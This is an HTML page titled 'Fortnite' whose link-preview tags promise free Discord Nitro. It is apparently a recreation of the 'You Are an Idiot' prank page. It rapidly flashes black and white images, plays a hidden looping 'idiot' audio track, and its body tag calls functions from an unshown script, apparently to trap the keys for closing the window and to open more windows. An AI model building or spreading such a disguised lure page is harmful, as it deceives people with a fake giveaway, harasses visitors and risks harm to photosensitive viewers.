<!DOCTYPE html>
<html lang="en">
<head>
    <title>Fortnite</title>
    <meta property="og:title" content="EPIC FWEE NITRO (WORKING) (NO-SUBSCRIPTION)">
    <meta property="og:description" content="How to get fwee nitro in 2029">
    <meta property="og:image" content="https://cdn1.epicgames.com/salesEvent/salesEvent/EGS_Discord_Nitro_2560x1440_withlogo_2560x1440-944994658df3b04d0c4940be832da19e">
    <meta property="og:video" content="/ms.mp4">
    <style>
        audio {
            display: none; /* Hide the audio player */
        }

        @keyframes img-1 {
            0%, 100% {
                opacity: 1;
            }
            50% {
                opacity: 0;
            }
        }

        @keyframes img-2 {
            0%, 100% {
                opacity: 0;
            }
            50% {
                opacity: 1;
            }
        }

        .wrapper {
            margin-left: 16.5% !important;
            position: relative;
            height: 100%;
            width: 68%;
        }

        .wrapper img:first-child {
            position: absolute;
            width: 100%;
            opacity: 1;
            animation: img-1 0.4s infinite;
        }

        .wrapper img:last-child {
            position: absolute;
            width: 100%;
            opacity: 0;
            animation: img-2 0.4s infinite;
        }

        body {
            user-select: none;
        }
    </style>
    <script src="you.js"></script>
</head>
<body onload="flagRun=1;playBall();return true;bookmark();" onkeydown="altf4key();ctrlwkey();delkey();" onmouseout="procreate();" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
    <div class="wrapper">
        <img src="black.png">
        <img src="white.png">
    </div>
    <audio id="IdiotAudio" autoplay loop>
        <source src="idiotmp3.mp3" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
    <script>
        var audio = document.getElementById("IdiotAudio");
        audio.autoplay = true;
        audio.loop = true;

        document.addEventListener('click', function() {
            if (audio.paused) {
                audio.play();
            }
        });
    </script>
</body>
</html>
